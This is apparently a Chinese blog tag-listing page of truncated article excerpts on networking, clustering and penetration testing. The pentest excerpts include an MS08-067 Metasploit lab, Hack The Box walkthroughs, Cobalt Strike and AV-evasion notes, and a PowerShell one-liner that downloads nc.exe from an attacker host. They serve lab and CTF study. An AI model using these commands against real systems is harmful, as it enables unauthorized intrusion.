首页 > TAG信息列表 > 10.10
10.10 斐波那契数列_本章总结
#斐波那契数列 计算 1,1,2,3,5,8 后面的数为前面两数相加 def fib(n): if n==1: return 1 elif n==2: return 1 else: return fib(n-1)+fib(n-2) #斐波那契数列第6位上的数字 print(fib(6)) print('-----------------------超详细的网络抓包神器 tcpdump 使用指南
原文链接:Tcpdump 示例教程 本文主要内容翻译自《Tcpdump Examples》。 tcpdump 是一款强大的网络抓包工具,它使用 libpcap 库来抓取网络数据包,这个库在几乎在所有的 Linux/Unix 中都有。熟悉 tcpdump 的使用能够帮助你分析调试网络数据,本文将通过一个个具体的示例来介绍它在不售中实施(韦保字)
总则: 与电有关的,优先让场里设备管理员接线/协助。 物料缺少优先找场长或采购。 网络拓扑: 一、硬件配置及说明 1.外网路由器初始设置参数: LAN:10.10.10.1,255.255.255.0,DHCP从10.10.10.11开始(预留10.10.10.1~10.10.10.10给主要设备使用) 外网路由器主要用于连接外网,配RabbitMQ 集群部署方式
多机多节点集群部署 一、 环境准备 准备三台安装好RabbitMQ 的机器,安装方法见 安装步骤 10.10.1.41 10.10.1.42 10.10.1.43 提示:如果使用虚拟机,可以在一台VM上安装好RabbitMQ后,创建快照,从快照创建链接克隆,会节省 很多磁盘空间oracel RAC 心跳线对集群的影响
测试,oracle集群心跳线断开测试集群状态,和实例状态 测试环境 Oracle VM VirtualBox + centos7.6 + oracle 11.2.0.4 首先登陆系统 ,切换grid用户 查看集群状态 [grid@ora01 ~]$ [grid@ora01 ~]$ crsctl check cluster -all ******************************************ensp网管配置
关闭泛洪信息:un ter m 交换机左ACC1: sys sys ACC1 [ACC1]vlan batch 10 [ACC1]interface eth-trunk 1 [ACC1-Eth-Trunk1] port link-type trunk //配置为trunk模式,用于透传VLAN。 [ACC1-Eth-Trunk1] port trunk allow-pass vlan 10 //配置Eth-Trunk1透传ACC1上的业务VLAN [ACC1-Epve ceph 故障后的删除
1.查看当前mon节点 [root@mon1 ~]# ceph mon state2: 3 mons at {alpha=10.10.200.3:6789/0,beta=10.10.200.4:6789/0,gamma=10.10.200.10:6789/0}, election epoch 84, quorum 0,1,2 alpha,beta,gamma 2.例如删除mon.gamma节点,首先停止mon.gamma节点 [root@mon1 ~]# /etc/initms08_067
ms08-067 漏洞描述: Microsoft Windows Server服务RPC请求缓冲区溢出漏洞 复现流程: 在网络畅通的情况下进行 靶机:nat,10.10.10.146 攻击机:nat,10.10.10.150 输入命令msfconsole 查看主机是否存活:ping 10.10.10.150,存活 查找是否有ms08067漏洞模块 配置响应参数:使用,靶机地址,攻设置debian的静态IP
ipconfig -all可查看一下信息 想要设置网络的信息如下 IP地址:10.10.10.155 子网掩码:255.255.255.0 网关:10.10.10.2 广播地址:10.10.10.255 DNS:10.10.10.2,114.114.114.114 我们需要编辑2个文件 /etc/network/interfaces(配置IP和网关) /etc/resolv.conf(配置DNS服务器) 查看可用网卡 rooharbor简述
harbor1 192.168.10.10 harbor2 192.168.10.11 harbor作为私有仓库被广泛使用。harbor依赖docker和docker-compose,所以要先安装docker和docker-compse。系统版本什么版本都可以 1安装docker和docker-compose,自行安装 2下载harbor,地址如下 https://github.com/goharbor批量telnet服务端口
当某个服务需要访问比较多的服务时,需要检查端口是否打通。可以使用如下脚本 注意: 1、当某个端口不通时,程序会停止运行。 例子: --服务器列表 cat host.txt [xxxxxxx@xxxxxxxx ~]$ cat host.txt 10.10.10.10 50000 10.10.10.10 443 --脚本 #!/bin/bash while read line do多级负载均衡搭建
多级负载均衡搭建(四层+七层架构) 框架图: 实验环境 LVS-------eno16777736:10.10.10.11 eno16777736:0 :10.10.10.100 Nginx-----eno16777736:10.10.10.12 lo:0 :10.10.10.100 Nginx-----eno16777736:10.10.10.13 lo:0 :10.10.10.100 apache1-----eno16777736:10.10.10.14 apa[Hack The Box] HTB—Secret walkthrough
[Hack The Box] HTB—Secret walkthrough machine :Hack The Box—Secret HTB—Secret [Hack The Box] HTB—Secret walkthrough一、信息搜集二、网站渗透1.jwt伪造2.命令执行3.写入ssh公钥 三、提权 一、信息搜集 nmap nmap -sV 10.10.11.120 PORT STATE SERVICE基于资源的约束委派
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控OSPF附录E
附录E(RFC 2328) OPSF标准文档RFC2328中,附录e中描述了OSPF在某些特定环境下会出现路由计算错误问题,从而给组网应用带来隐患。 OSPF是一种基于链路状态型路由协议,其中3类、5类、7类LSA传递的是路由信息,link-id为传递路 由条目网络号,并且不识别网络掩码;区别不同的3/5/7类LSA使用MSF后渗透之进阶知识
文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内HackTheBox-Return
文章目录 概述声明题目概述信息收集初始立足点权限提升 概述 HackTheBox 是一个经典的在线靶机平台,提供了大量漏洞演练和CTF演练场景。 本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击HTB靶场系列 Windows靶机 Slio靶机
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识 勘探 nmap -sC -sV 10.10.10.82 Starting Nmap测试
测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试 YJ.li 容器 数据库 自动化 网站架构 管理 LVS负载均衡DR模式实现 LVS负载均衡之DR模式配置# DR 模式架构pentest魔法书
常用命令介绍: powershell ping扫描: 1..255 | % {echo "192.168.0.$"; ping -n 1 -w 100 192.168.0.$ | Select-String ttl} powershell下载: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","c:\nc.exe") Win 8 and la三层网络防护的域渗透
目录 环境准备网络拓扑配置网卡网络联通性测试一些账号绑定host其他目标 信息收集端口扫描美化扫描结果 网站探测指纹识别WAF识别目录扫描siteserver 漏洞利用绕狗注入忘记密码上传木马getshell 后渗透提权菜刀转msfmsf生成shellcodeAdvanced AV Evasion免杀MSF开启监听获Hadoop部署
物理机环境 CPU: Intel® Xeon® CPU D-1581 @ 1.80GHz 内存: 64 GiB DDR3 Single-bit ECC 硬盘:HS-SSD-C2000Pro_2048G_30037121557 虚拟机架构 hostname IP CentOS-01 10.10.10.31 CentOS-02 10.10.10.32 CentOS-03 10.10.10.33 安装模板虚拟机 主机名称 CentOS-0【工具】Cobalt Strile安装及简单使用
简介 Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木ATT&CK实战系列(二)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情 拓扑结构大体如下: 环境搭建 Kali ip:192.168.111.135 Web Ip1:192.168.111.80 Ip2:10.10.10.80 os:windows 2008 应用:weblogic 10.3.6 mssql 2008 Pc Ip1:192.168.111.201 Ip2:10.10.10.201 Os:windows7OSPF广播型网络如何计算路由?它独有的LSA 2包含什么信息?
OSPF在广播型网络的拓扑绘制和点到点有什么不同? OSPF广播型网络独有的LSA 2包含什么信息? OSPF广播型网络如何计算路由? 广播型网络拓扑和点到点拓扑的区别 对OSPF来说,不同的网络类型,工作原理略有不同。OSPF的网络类型总共有四种,实际会遇到的只有两种,分别是广播型和点到点。